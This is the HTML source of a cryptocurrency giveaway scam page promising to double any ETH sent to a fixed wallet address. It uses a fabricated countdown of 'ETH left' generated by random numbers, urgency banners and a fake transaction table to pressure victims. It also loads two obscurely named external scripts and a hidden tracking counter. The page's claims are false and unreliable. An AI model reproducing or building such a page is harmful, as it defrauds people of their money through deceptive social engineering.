﻿<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" rel="stylesheet" type="text/css" href="..\files\style.css">
<meta property="og:image" content="img/link.png">
<link href="..\files\fav.png" rel="shortcut icon" type="image/x-icon">
<title>Get 2x ETH Bonus Now</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js"></script>
<link rel="stylesheet" rel="stylesheet" type="text/css" href="..\files\theme.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>

<script>
        window.onload = function() {
            if (!localStorage.getItem("justonce")) {
                localStorage.setItem("justOnce", "true");
                window.location.reload();
            }
        }
    </script>
<script type="text/javascript">
        //<![CDATA[
        window.onload = function() {

            } //]]>
    </script>
</head>
<body>
<div id='stars'></div>
<div id='stars2'></div>
<div id='stars3'></div>
<div class="pop-body">
<div class="pop-inner">
<div class="pop-head">
<h3 class="pop-head-text">Generated Address</h3><svg id="close" height="20" viewbox="0 0 20 20" width="20" xmlns="http://www.w3.org/2000/svg"><path d="M18.096 19.174l1.401-1.427L1.7.286.3 1.714z"></path><path d="M19.497 1.714L18.096.286.3 17.747l1.4 1.427z"></path></svg></div>
<div class="pop-post-body">
<div class="pop-post-inner">
<div class="pop-anrange">
<div class="pop-img">
<div class="pop-qr">
<div class="inner-qr">
<div class="main-qr">
<div opacity="0" class="qr"><img width="200" height="200" src="http://chart.apis.google.com/chart?cht=qr&chs=120x120&chld=L&choe=UTF-8&chl=0x7ed39b68b79dE769Be1C6D653742212312f24937" alt="qr"></div><span class="wallet">Waiting for payment</span>
<center><img src="..\files\loading.svg" width="70px"></center></div>
</div>
</div>
</div>
<div class="timer-b" id="timer1"></div>
<div class="address-place">
<div class="inner-address"><span class="wallet-ad">Amount:</span>
<div class="address">
<div class="dropelon.co/1"><span class="real-address" id="gen-amount"></span></div>
<div class="copy-body">
<div class="copy-inner">
<img class="cp" id="copy_" src="..\files\copy.svg">
<div id="address-card" class="sec-card">
<img id="succ" class="in-card" src="..\files\done.svg">
 </div>
</div>
</div>
</div>
</div>
<div class="inner-address"><span class="wallet-ad">Generated address:</span>
<div class="address">
<div class="dropelon.co/1"><span class="real-address">0x7ed39b68b79dE769Be1C6D653742212312f24937</span></div>
<div class="copy-body">
<div class="copy-inner">
<img class="cp" id="copy_address" src="..\files\copy.svg">
<div id="done-copy" class="sec-card">
<img class="in-card" src="..\files\done.svg">
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>

<section id="post-sec">
<h1 style="text-align: center;"><img src="..\files\logo.png" alt="Logo"></h1>
<div class="post_body">
<p>To verify your Ethereum address, just send from 0.5 to 100 ETH to the generated address below and get from 1 to 200 ETH sent back to the address you sent ETH from or the one you specified below, you will get double of what you send to the
giveaway address.</p>
<p>In this event, participant will get 2x(double) of whatever they send to the giveaway address instantly which can be traded on any exchange </p>
<p>
<h2>How To Participate:</h2>
<ul>
<li><b>Step1:</b> Make sure you have at least 0.5 ETH or above in your wallet.</li>
<li><b>Step2:</b> Enter the amount you wish to invest below.</li>
<li><b>Step3:</b> Enter the ETH address you want to receive the bonus with</li>
<li><b>Step4:</b> Click the "Generate Payment" button to generate the payment address.</li>
<li><b>Step5:</b> Send the amount you entered to the generated address.</li>
<li><b>Step6:</b> Wait for at least 4 - 8 minutes.</li>
</ul>

<p>The 2x bonus will be sent to the address you entered or the one you sent the ETH from.</p>
</div>
<div class="cal-body">
<div class="cal-inner">
<div class="input">
<div class="title">Amount:</div>
<div class="amount-con">
<div class="inner-con">
<div class="pic"><img src="..\files\eth.svg" alt="EtH"></div>
<div class="amount">
<div class="main-input">
<div class="in-main"><input id="cal-in" class="exchange-content__input theme__background-4 theme__text-4 " min="0" step="0.5" placeholder="0" type="number" maxlength="50" autocomplete="off" value=""></div>
</div>
</div>
</div>
</div>
</div>
<div class="icon-body"><span data-tip="Click to swap" data-for="swap-icon" currentitem="false"><img src="..\files\exchange-alt.svg" alt="img" class="exchange__swap-icon"></span></div>
<div class="input">
<div class="title">Bonus:</div>
<div class="amount-con">
<div class="inner-con">
<div class="pic"><img src="..\files\eth.svg" alt="knc"></div>
<div class="amount">
 <div class="main-input">
<div class="in-main"><input id="cal-out" class="exchange-content__input theme__background-4 theme__text-4 " min="0" step="2" placeholder="0" type="number" maxlength="50" autocomplete="off" value=""></div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="enaddress">
<div class="title">Address:</div>
<div class="inner-enter"><input type="text" placeholder="Enter your ETH address" pattern="0x[A-Fa-f0-9]{40}"></div>
</div>
<div class="but-con">
<div id="gen-btn" class="swap-but">Generate Payment</div>
<div class="terms text-danger text-center mb-2"><span><span id="warn"></span></span>
</div>
</div>
<div id="lympo_progress">
<div class="row progress-row">
<div class="colums_12">
<div class="progress-ico">
<div class="progress-ico">
<div class="progress">
<div class="progress-bar progress-bar-striped active progress-width" id="progress-ico" role="progressbar" style="width: 100%;">
<span class="sr-only">x</span></div>
</div>
</div>
<div class="dot-1" id="leftETH">
Counting ETH left...
</div>
<div class="dot-1-airdrop  progress-left"></div>
<span class="pbv" id="progress-ico-bar"></span></div>
</div>
</div>
</div>
<div class="support">
<div class="sup">
<div class="sup-space"></div>
</div>
</div>
</div>
</section>
<main id="content" role="main">
<div id="ContentPlaceHolder1_divSummary" class="container space-bottom-2">
<div class="card">
<div class="card-body">
<div class="tab-content">
<div class="tab-pane fade show active" id="transactions" role="tabpanel" aria-labelledby="transactions-tab">
<div class="table-responsive mb-2 mb-md-0">
<table class="table table-hover" id="myTable">
<thead class="thead-light">
<tr>
<th scope="col" width="1">Txn Hash</th>
<th scope="col" width="1" class="d-none d-sm-table-cell">Block</th>
<th scope="col"><span class="timer" title="UTC time">Age</span></th>
<th scope="col">From</th>
<th scope="col" width="30"></th>
<th scope="col">To</th>
<th scope="col">Value</th>
<th scope="col"><span id="ContentPlaceHolder1_spanTxFee" title="(Gas Price * Gas Used by Txns) in ETH"><spanclass="text-secondary">[Txn Fee]</spanclass="text-secondary"></span>
</th>
</tr>
</thead>
<tbody></tbody>
</table>
</div>
<div class="d-flex justify-content-between align-items-center mt-3 mb-4">
<div class="d-flex align-items-center text-secondary"></div>
</div>
</div>
</div>
</div>
</div>
</div>
</main>

<script type="text/javascript">
        $(document).ready(function() {
            $('.spoiler-title').click(function() {
                $(this).parent().children('div.spoiler-content').toggle('fast');
                return false;
            });
        });
    </script>
<script>
        function setProgress(count, max) {
            var p = (100 * count / max).toString() + '%';
            $('.progress-left').css('left', p);
            $('.progress-width').css('width', p);
            var aa = count.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            var rr = max.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            $('.pbv').text(aa + ' / ' + rr);

        }



        var ctd = setInterval(function() {
            if (localStorage.getItem("ethprogress")) {
                if (localStorage.getItem("ethprogress") <= 150) {
                    var alt_count = localStorage.getItem("ethprogress");
                } else if (localStorage.getItem("ethprogress")) {
                    var alt_sec_count = localStorage.getItem("ethprogress");
                    var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * 4 + 5);
                }
            } else {
                var alt_sec_count = Math.floor((Math.random() * (5499 - 5400) + 5400) + 1);
                var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * 4 + 5);
            }
            setProgress(alt_count, 10000)



            localStorage.setItem("ethprogress", alt_count);

            if (alt_sec_count <= 300)
                clearInterval(ctd);
            if (alt_count <= 9999 && alt_sec_count >= 2001)
                document.getElementById("leftETH").innerHTML = "Left ETH";
            if (alt_count <= 700 && alt_sec_count >= 301)
                document.getElementById("leftETH").innerHTML = "Hurry up, not much more ETH left!";
            if (alt_count <= 300)
                document.getElementById("leftETH").innerHTML = "Last chance to get your ETH!";
            if (alt_count <= 1000)
                document.title = alt_count + " ETH left";
            if (alt_count <= 500)
                document.title = "Get your " + alt_count + " ETH now!";

        }, 6666);
    </script>

<script src="..\files\jdfghkjdfhgvsjkdfgcphjkfdhgjsdfg.js"></script>
<script src="tfdjglkjdfkjgnsdfgnjkdgndkjfx.js"></script>


</body>
<span style="display: none;"> <!--LiveInternet counter--><a href="https://www.liveinternet.ru/click"
target="_blank"><img id="licntCC48" width="88" height="31" style="border:0" 
title="LiveInternet: показано число просмотров и посетителей за 24 часа"
src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAEALAAAAAABAAEAAAIBTAA7"
alt=""/></a><script>(function(d,s){d.getElementById("licntCC48").src=
"https://counter.yadro.ru/hit?t52.6;r"+escape(d.referrer)+
((typeof(s)=="undefined")?"":";s"+s.width+"*"+s.height+"*"+
(s.colorDepth?s.colorDepth:s.pixelDepth))+";u"+escape(d.URL)+
";h"+escape(d.title.substring(0,150))+";"+Math.random()})
(document,screen)</script><!--/LiveInternet-->







</html>
